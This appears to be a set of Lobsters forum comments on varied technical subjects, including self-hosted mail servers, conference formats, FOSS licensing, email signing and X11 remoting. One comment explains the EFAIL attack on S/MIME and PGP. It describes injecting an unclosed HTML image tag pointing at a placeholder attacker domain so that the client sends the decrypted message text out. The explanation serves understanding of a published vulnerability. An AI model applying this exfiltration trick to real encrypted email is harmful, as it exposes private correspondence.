1. 1

    The work-around I found is console.log("x: " + JSON.stringify(x));

    1. 1

      If you need to explicitly convert the object to a string like this, the output will be easier to read if you pretty-print it. You can do this by passing JSON.stringify a value such as 2 or '\t' for its third argument, space:

      console.log("x: " + JSON.stringify(x, null, 2));
      
    1. 3

      I always use xeyes(1) for testing X-forwarding. It’s cuter. Using it as an alarm never occurred to me, simple and good idea.

      1. 19

        Half a GB of memory is tight for a mail-server now? Postfix is terribly confusing? Running your own mail-server is probably a terrible idea?

        Boy, I am getting old.

        I used to run sendmail on a machine at home with <8 MB of RAM, and I didn’t have an internet connection, so I stored the emails on a floppy disk, which I took by bike to the university to send them, and to fetch any new incoming emails.

        All the SPF, DKIM, DMARC, TLS certificates and spam-prevention is much more complicated these days, admittedly.

        Congratulations on getting it up and running, though.

        1. 6

          Half a GB of memory is tight for a mail-server now?

          …used to run sendmail on a machine at home with <8 MB of RAM

          I don’t think it’s fair to compare sendmail, which is extremely basic, to some of currently mail server, uh, suites with spam filtering, web UIs for config/maintaining (which some people like, I couldn’t care less), etc. Some even provide a webmail interface! I think you lose some system resources in the abstraction necessary to lower the bar for setup/running these things. Not everyone has the patience/know-how/time to configure dozens of tools individually to accomplish all of this.

          Running your own mail-server is probably a terrible idea?

          Nowadays you’ll find your mails being rejected or silently stuffed into recipients’ “spam” folders by google because they don’t recognize your domain(1), and you’ll lose data (incoming mail) when your mail server goes down for (insert unforeseen reason here) and you are on vacation and cannot fix it. It’s not your grandpa’s email anymore.

          1. I still have this problem with my current mail provider mailbox.org, who has been providing email service since 2014. If google still cannot get the hint that they are legit, then there’s little hope for folks using custom domains.
          1. 7

            I’ve been running my own email server since 1998 (and with the current IP address for over a decade now) and I’ve never had an issue of it going down while on vacation. If you are that concerned (and you don’t check email at all on vacation) then spring for a back-up MX service (just be aware that spammers will target the backup MX in the hopes of slipping past spam detection).

            1. 5

              Google silently dropping messages from domains with DKIM/DMARC/etc. setup correctly is a problem of Google, and probably even an anti-competitive tactic. I don’t have that problem often, but when I do, it’s invariably Gmail that does it.

              As of data loss, correctly implemented SMTP servers must retry sending a message at increasing intervals, up to about a week. Most actually do. I haven’t seen Postfix crash in my life, even in very busy setups though, so I never got to verify how far it stretches in practice.

              1. 2

                Regarding resources: One has to bear in mind that it is a personal system. Spam filtering, web UI (does that mean webmail?), etc. would not be under heavy load. I think this is quite reasonable.

                Also regarding ending up in spam. I think that’s mostly a myth. Yes, it’s true if you really only send mail without SPF, DKIM, make sure your PTR is set correctly, etc. If you do this as a one-time setup you’re fine.

                Regarding mailserver going down: First of all this is very, very rare. More rare than in cases of many other protocols. Simply because it’s old and unless you constantly change stuff you will end up with something stable fairly quickly. This is by the way a reason why you might not want to use “new” stuff like docker.

                Other than that, emails don’t really get lost other than for storage reasons usually. Again, unlike with other protocols delivery is retried and mails might be returned.

                I think one has to differentiate between personal email and running a small mail provider, sending out newsletters, etc. Sending the same email to many gmail recipients for example is a lot more likely to trigger something than an individual mail. Also if emails do in fact get rejected you will learn about this. So if you want to be absolutely secure, have a fallback.

                While it’s of course a service and it’s not exactly zero maintenance, email tends to be by far the easiest thing to maintain once initially set up. Of course, that’s given you don’t try to be super smart and of course only if you have a basic understanding on what you are doing. If you use your OS for the first time the story is different of course.

              2. 3

                Boy, I am getting old.

                Either that, or I’m just new. :)
                Thanks anyway!

              1. 12

                This conference is “virtual”, so it won’t influence your travel(/CO₂)-budget 👍

                1. 2

                  Actually this disappointed me a bit, “real” presentations tend to easier to follow and conversations/questions are more natural too.

                  But I get the CO2 point. If I would have to fly to get there, I wouldn’t go, either way.

                  1. 3

                    Yeah, but putting together a physical conference is a lot of work¹, and the audience might be limited - so I tried to spin it as a positive thing :-)

                    ¹ It has been “real” before, though, unfortunately I wasn’t able to attend the one in London, and I don’t want to fly to the US.

                    1. 5

                      We need more of those. For a lot of people, any real world conference is completely out of reach.

                      1. 5

                        Both. We also need more local conferences, so that people who need to be close to people to be in touch don’t have to fly across the globe.

                        Seriously, I’d wish we’d go back from 1000-2000 people conferences to something like 100-150 where it is rather easy to find a room for in any city across the globe.

                        Also, there’s conference models that are easy to organise and literally can be set up in 2-3 days.

                        All that with experience, mind you, which is a good reason to not frustrate our community organisers and make sure they run another one after trying it out once.

                        1. 1

                          I’d like to hear about those models.

                          1. 4

                            This is kind of how we ran Fennel Conf: https://conf.fennel-lang.org/2019

                            It was very low-key with a small conference-room full of attendees in person and 4-6 folks who joined our Jitsi stream as we went.

                            1. 2

                              Yeah, stuff like that. There’s tons of value in not overworking yourselves in running a large conf. I see a lot of good in raising the organisational quality of FOSS community conferences, but we need to constantly remind people that all this isn’t always necessary.

                            2. 4

                              First off all: get an easy venue. For small conferences, a contact to a professor is at a university is nice, or a friendly company in town that has an event room of that size. Get no catering, just drinks. If you want to get catering, ask around the organiser scene in your location for a recommendation, pick that. Nothing mindblowing, just good food. You may want vegan, vegetarian and all the options: caterers are professionals, just ask for that.

                              Volunteer organisers are well-connected and are very willing to give out help of that kind. They were all beginners once and want to keep others of that harm.

                              Format: don’t do speakers management. That is the biggest time-sink. There’s models that don’t need it!

                              • Unconferences: everyone brings their session suggestions, but the choice is at the location. Needs a location with multiple rooms.
                              • Spontanous conferences: Kind of similar to the above, but you have just one room, people can suggest talks beforehands on a wiki or Github or so.

                              You can take that to the extreme, e.g. lightning.io was a conference that only had lightning talks and every attendee needed to talk.

                              The point is that you want strategies that organise on the day.

                              Ticket sales: Stripe and ti.to are the low-friction option. Especially ti.to, it’s completely geared towards events like this. The biggest problem here is where the money goes. Setting up a company/non-profit/bank-account is easily the biggest part in this. Finding someone at your location to take you in their books is the best option. Again, get in touch with other organisers.

                            3. 1

                              150?! I find 5 or 6 people to be great for a conference.

                              1. 1

                                I’d call that a small meeting?

                                25 is definitely a feasible thing for a conference though. I don’t want to be judgemental there. I picked 100-150 because it is an easy number to reach for even fringe subjects even without advertising in places like Berlin.

                                1. 1

                                  Conference is just a fancy word for “meeting” :)

                                  I personally get a lot more out of smaller group meetings. When it’s someone giving a talk to a larger audience, even 20 people, I have a harder time paying attention and I feel more shy about asking questions. Maybe that’s just me?

                                  Of course having more people in a room is more efficient for conveying information, provided they are paying attention and understanding what is said.

                                  1. 1

                                    Conference is just a fancy word for “meeting” :)

                                    Yes, and indeed, it is one of those words with a 1000 meanings. In the context we’re talking about, conferences are usually larger endeavours. If I say “I tend to run conferences”, no one assumes I do 20 person things.

                                    I personally get a lot more out of smaller group meetings. When it’s someone giving a talk to a larger audience, even 20 people, I have a harder time paying attention and I feel more shy about asking questions. Maybe that’s just me?

                                    Probably, but that’s fine. I’ve been running many events in different styles of all sizes and all have their advantages to certain people. That’s why I’m such a huge proponent to have more events. (Some people think that there should be less events, nowadays)

                                    E.g. the first larger event I ran (eurucamp) consciously reduced talk time for a very long lunch break (5 hours), where people could just hang around an chat around a Berlin lake in summer. It’s a common problem that organisers mistake “program” for “the useful time” for attendees. People loved it, and came back specifically for that, yet some wanted a more classic schedule at an easier reachable place and didn’t come next year.

                                    If rigorous learning of a subject is what you want, something over 6 people is probably indeed not the right thing. Conferences above 50 people mainly use the talks as inspirations for things to later chat about.

                    1. 3

                      I seem to have an affinity to implementing nntp-interfaces to things. Latest unfinished project is a blog engine using nntp to control it (posts and comments). Finished projects include an Atom/RSS feed reader with an nntp interface.

                      Gnus will do that to you. Well, me, anyway.

                      1. 9

                        Why would you not make curl/libcurl Free/Open Source Software? Why would you want to not share the joy, burden and benefits with the world?

                        How much would the author have gained from making it proprietary, limiting its use (and usefulness) and restricting other people from contributing, compared to what he actually got?

                        I think Stenberg’s reply on StackOverflow answers most of these questions - the interesting part is that the person posing the question sees it from such a different angle compared to the creator.

                        How can we improve the communication so the logic and dynamics of Free/Open Source Software becomes more obvious and well-known?

                        1. 19

                          Well, by not releasing it freely, you get a lot less hate mail from people claiming you’ve hacked their car and they’re going to call the police, etc.

                          1. 3

                            Why would you not make curl/libcurl Free/Open Source Software? Why would you want to not share the joy, burden and benefits with the world?

                            You can share the joy with the world by making it free for non-commercial use but cheap and shared source for commercial use. Scaled from tiny amount for micro-businesses to larger amount for larger companies. Then, folks can enjoy it, fix it, and send potential improvements. The money from commercial use gets developers paid to improve that product and make more. The extras might be [F]OSS. Sciter’s price/access scaling is one of my favorite examples of how that might play out.

                            By not charging and using open license, the value was moved into the businesses who used it for a lot of other things. Most of those probably weren’t awesome. Some might have even been harmful to software developers. It did increase the uptake by selfish, commercial parties. There were also contributions that might have not happened under a non-open license. The author loves both benefits. So, the author made a good choice for their preferences.

                            1. 1

                              Wonder what sciter is. I looked on the site and it is not clear.

                              1. 1

                                Know the web-like UI’s in programs like antivirus going way back? They often use Sciter to do that. It’s like Electron before Electron with minimal resource use. First answer in this link gives both more information and an example of how small the portable apps can be.

                          1. 6

                            Is there an easy way to get a list of what images may have been affected?

                            1. 1

                              I second this, as it would allow many of us to at least be wary of any builds using base images which might have been affected. More transparency on this issue would have a great security impact, at least in my case.

                            1. 1

                              I use a text file, ~/.worklog, that I keep in “Debian Changelog format”. If you use Emacs there is a debian-changelog-mode that helps, if not there is a command-line program, dch, to help with the formatting.

                              It’s very simple, just a slight step above a free format text file in reverse chronological order.

                              And if you want it version controlled, that’s easy (using git or any other version control system you like), and it is both searchable (grep, ag or whatever your preference is) and since it is a text file, it is diff’able out of the box.

                              Works well for me; I keep it open in a separate window and update it continously - very low friction.

                              1. 17

                                The problem is we have two bad solutions, but bad for different reasons. None of them works transparently for the user.

                                GnuPG was built by nerds who thought you could explain the Web of Trust to a normal human being. S/MIME was built to create a business model for CAs. You have to get a cert from somewhere and pay for it. (Also for encryption S/MIME is just broken, but we’re talking signatures here, so…) And yeah, I know there are options to get one for free, but the issue is, it’s not automated.

                                Some people here compare it to HTTPS. There’s just no tech like HTTPS for email. HTTPS from the user side works completely transparently and for the web admin it’s getting much easier with ACME and Let’s Encrypt.

                                1. 7

                                  We don’t need WoT here though. WoT exists so you can send me a signed/encrypted email. Nice, but that’s not what’s needed here.

                                  1. 3

                                    Of course you need a some measure of trust like a WoT or CA because how else are you going to verify that the sender is legitimate? Without that you can only really do xkcd authentication.

                                    1. 5

                                      Yes, you need some way to determine what you trust; but WoT states that if you trust Alice and I trust you, then I also trust Alice, and then eventually this web will be large enough I’ll be able to verify emails from everyone.

                                      But that’s not the goal here; I just want to verify a bunch of organisations I communicate with; like, say, my government.

                                      I think that maybe we’ve been too distracted with building a generic solution here.

                                      Also see my reply to your other post for some possible alternatives: https://lobste.rs/s/1cxqho/why_is_no_one_signing_their_emails#c_mllanb

                                      1. 1

                                        Trust On First Use goes a long way, especially when you have encrypted (all its faults nonewithstanding) and the communication is bidirectional as the recipient will notice that something is off if you use the wrong key to encrypt for them.

                                    2. 1

                                      Also for encryption S/MIME is just broken

                                      It is? How?

                                      1. 2

                                        The vulnerability published last year was dubbed EFAIL.

                                        1. 1

                                          Gotcha. Interesting read. I’ll summarize for anyone who doesn’t want to read the paper.

                                          The attack on S/MIME is a known plaintext attack that guesses—almost always correctly—that the encrypted message starts with “Content-type: multipart/signed”. You then can derive the initial parameters of the CBC encryption mode, and prepend valid encrypted data to the message, that will chain properly to the remainder of the message.

                                          To exfiltrate the message contents you prepend HTML that will send the contents of the message to a remote server, like an <img> tag with src="http://example-attacker-domain.com/ without a closing quote. When the email client loads images, it sends a request to the attacking server containing the fully decrypted contents of the message.

                                          S/MIME relies on the enclosed signature for authenticity AND integrity, rather than using an authenticated encryption scheme that guarantees the integrity of the encrypted message before decryption. Email clients show you the signature is invalid when you open the message, but still render the altered HTML. To stop this attack clients must refuse to render messages with invalid signatures, with no option for user override. According to their tests, no clients do this. The only existing email clients immune to the attack seem to be those that don’t know how to render HTML in the first place.

                                          The GPG attack is similar. Unlike S/MIME, GPG includes a modification detection code (MDC). The attack on GPG thus relies on a buggy client ignoring errors validating the MDC, like accepting messages with the MDC stripped out, or even accepting messages with an incorrect MDC. A shocking 10 out of 28 clients tested had an exploitable form of this bug, including the popular Enigmail plugin.

                                    1. 5

                                      I like the name “Perl”, because it can be pronounced in (at least) two ways, and a Perl slogan was “There is more than one way to do it”.

                                      It also has an irreverent backronym expansion, if you want.

                                      I also like “Miranda”, because it sounds friendly.

                                      1. 4

                                        In which way can Perl be pronounced other than “pearl”?

                                        1. 2

                                          “Peril” /s

                                          1. 1

                                            Straight, with ‘e’ instead of ‘ae’-sound - as in [I am not a native English speaker] … well, sort of like if you take the sound by clicking on UK here https://dictionary.cambridge.org/pronunciation/english/pair and add an L to the end. Almost rhymes with the fruit pear.

                                            1. 1

                                              I’m guessing “peerl”, although I’ve never heard anyone using this pronunciation. It also sounds funny to my Italian ears, as “pirla” (pronounced “peer-la”) means “silly person” in Lombard dialect.

                                          1. 14

                                            Lastly, changes can easily be slowed down significantly by holdouts who refuse to collaborate.

                                            He’s not wrong, but he is comparing his experiences with Debian with his experiences in a commercial enterprise (and a report of experiences at Google, another commercial enterprise). In a commercial setting, everybody cooperates or else they get fired, and the company hires somebody else to replace them. In a volunteer project like Debian, it’s a lot harder to get people on-board - they signed up for some particular level of involvement and autonomy, and trying to change the deal afterwards in either direction is going to make people angry and leave. And in a volunteer project, you can’t just hire somebody else, you have to wait for somebody else to show up. If your project has a reputation for changing the social contract, you might be waiting a very long time…

                                            1. 12

                                              I accept your point but the author pointed out that Debian can sometimes not take a decision for a long time which can cause volunteers to leave like the author himself. I believe it is good to have some sort of a steering committee so that decisions can be taken in case of an issue instead of it turning into a long battle.

                                              1. 11

                                                In a commercial setting, everybody cooperates or else they get fired

                                                Is very much possible to not cooperate in a company. It can be more or less hidden, but it happens all the time.

                                              1. 1

                                                If you do want a simple metric, this could be one: How often do you make the same mistake twice, rather than finding a way to minimize the chance of it happening again?

                                                1. 2

                                                  Another interesting one. I wonder how common it is for a programmer to make the same mistake many times. I have done this a handful of times, but it’s usually because the mistake is uncommon enough that I forgot having made it years ago.

                                                  1. 1

                                                    I have been cleaning up infinite loops left by a colleague in many a place, so some mistakes seem to be more like… habits.

                                                    I sure have also been cursing at myself for repeating mistakes, and then I tell myself to take the time to make a unit/regression test, so at least the test will tell me, rather than the users of the system.

                                                    One user gives quite frank feedback, to the tune of: “Didn’t you fix this before? How come it is broken again?” Which is both scalding and - maybe - also kind of fair enough.

                                                1. 3

                                                  I would like to see this but just as a tiny PC and hardware input device all in one. So you just hook up the USB (type C for display) to your laptop or a TV and you are away.

                                                  It would be like one of those stick PCs, except with an input device built in!

                                                  1. 2

                                                    I always thought it’d be cool to have something like the kinesis advantage pro (which I have) with a little folding LCD in the middle, a computer inside, and a thumbstick or two somewhere. Plus a bunch of ports for connecting it to stuff.

                                                    Perhaps with a battery inside.. :-)

                                                    Now just add a head-mounted display and you have a perfect travel computer.

                                                    Oh wait, did I just reinvent the laptop.

                                                    1. 2
                                                  1. 4

                                                    I’ve been using a home server (just a fanless power supply, a motherboard and an SSD lying on a shelf) running Debian stable, for a decade or so.

                                                    Works great for smtp (Postfix, OpenDMARC, OpenDKIM, SQLgrey), imap/pop (Dovecot), web (Apache, Catalyst, Spock, Hatta), dns (BIND), database (PostgreSQL), monitoring a camera (motion), weather station (weeWX, rtl_433), XMPP (ejabberd), CalDAV/CardDAV (Radicale), irc-proxy (BIP), ntpd, nntp-RSS/Atom gateway (homebrew).

                                                    1. 3

                                                      If you are having problems accessing the article in Google Groups, you can find it on olduse.net here: https://article.olduse.net/4737%40ethz.UUCP

                                                      1. 1

                                                        There is also an elisp package with HDFS support for TRAMP in Emacs: https://github.com/raghavgautam/tramp-hdfs - it supports Kerberos.

                                                        1. 2

                                                          I implemented my own simple OpenID-provider (in 252 lines including HTML, using the Perl OpenID-libraries), and was very happy with it and its UI. Too bad even Stack Overflow abandoned OpenID.

                                                          1. 2

                                                            It is very confusing that the Go language conference is called GopherCon - I mistake it for a conference on the gopher protocol, every time I see the name.

                                                            1. 1

                                                              I kind of think its their nefarious plan to wipe out the gopher protocol. The people behind the Go language must know the internet protocol, so picking the name ‘Gopher’ must be intentional. Perhaps google never liked gopher. Or the gopher could potentially hurt their business?

                                                              1. 1

                                                                I’d like to believe that the “cute” gopher mascot was a playful thing that took off and with which people identified, anthropomorphism is surprisingly successful for adoption.

                                                                1. 1

                                                                  “Never attribute to malice what can adequately be explained by incompetence” :-) - in this case it is probably more a case of not thinking that gopher, the protocol, has much widespread use/“mindshare”, I’d say. Which arguably is correct, albeit ignoring history a little [too] much.

                                                              1. 2

                                                                TL;DR: as long as:

                                                                • The mailinglist doesn’t change Subject and Body of the emails
                                                                • Senders from domains with DMARC also have DKIM

                                                                Seems reasonable - as the article argues that the reasons for modifying Subject and Body are solved by List-Id: and List-Unsubscribe: headers, and SPF+DKIM+DMARC is not that burdensome to set up.

                                                                1. 4

                                                                  Obviously, if we intend to make Wayland a replacement for X, we need to duplicate this functionality.

                                                                  Perhaps a less than popular opinion, but: No, you don’t. If you want to replace A with B, you don’t need to replicate every mistake A made. Then B wouldn’t be much else than A’, with old bugs and new.

                                                                  Don’t get me wrong, X’s network transparency might have been useful at some point - it isn’t now.

                                                                  1. 8

                                                                    Practice speaks otherwise, many people use it daily.

                                                                    1. 1

                                                                      That a lot of people use something daily doesn’t mean it is good, or needs to be replicated exactly. Running GUI programs remotely, and displaying them locally IS useful. It does not require network transparency, though.

                                                                      1. 1

                                                                        Require? Perhaps not. Makes things easier on some ways though.

                                                                    2. 6

                                                                      X’s network transparency might have been useful at some point - it isn’t now.

                                                                      I use it 5+ days a week - it is still highly useful to me.

                                                                      You’re right that fewer and fewer people know about it and use it - e.g. GTK has had a bug for many years that makes it necessary to stop Emacs after having opened a window remotely over X, and it’s not getting fixed, probably because X over network is not fashionable any more, so it isn’t prioritized.

                                                                      1. 2

                                                                        What is the advantage of X remoting over VNC / Remote Desktop?

                                                                        I remember using it in the past and being confused that File -> Open wasn’t finding my local files, because it looks exactly like a local application.

                                                                        I also remember that there were some bandwidth performance reasons. I don’t know if that is still applicable if applications use more of OpenGL and behave more like frame-buffers.

                                                                        1. 7

                                                                          Functional window management? If I resize a window to half screen, I don’t want to see only half of some remote window.

                                                                          1. 2

                                                                            Over a fast enough network, there’s no visible or functional difference between a local and remote X client. They get managed by the same wm, share the same copy/paste buffers, inherit the same X settings, and so on. Network transparency means just that: there’s no difference between local and remote X servers.

                                                                            1. 1

                                                                              It is faster, and you get just the window(s) of the application you start, integrated seamlessly in your desktop. You don’t have to worry about the other machine having a reasonable window manager setup, a similar resolution etc. etc.

                                                                              In the old days people making browsers, e.g. Netscape, took care to make the application X networking friendly. That has changed, and using a browser over a VDSL connection is only useful in a pinch - but running something remote like (graphical) Emacs, I prefer to do over X.

                                                                          2. 1

                                                                            I’d like to see something in-between X and RDP. Window-awareness built-in, rather than assuming a single physical monitor, and window-size (and DPI) coming from the viewer would by themselves be a big start.

                                                                            Edit: Ideally, pairing this with a standard format for streaming compressed textures, transforms, and compositor commands could solve a lot of problems, including the recent issue where we’re running up against physical bandwidth limitations trying to push pixels to multiple hi-def displays.

                                                                            1. 2

                                                                              FWIW I agree with you. It also so happens that something is coming soon enough .. https://github.com/letoram/arcan/wiki/Networking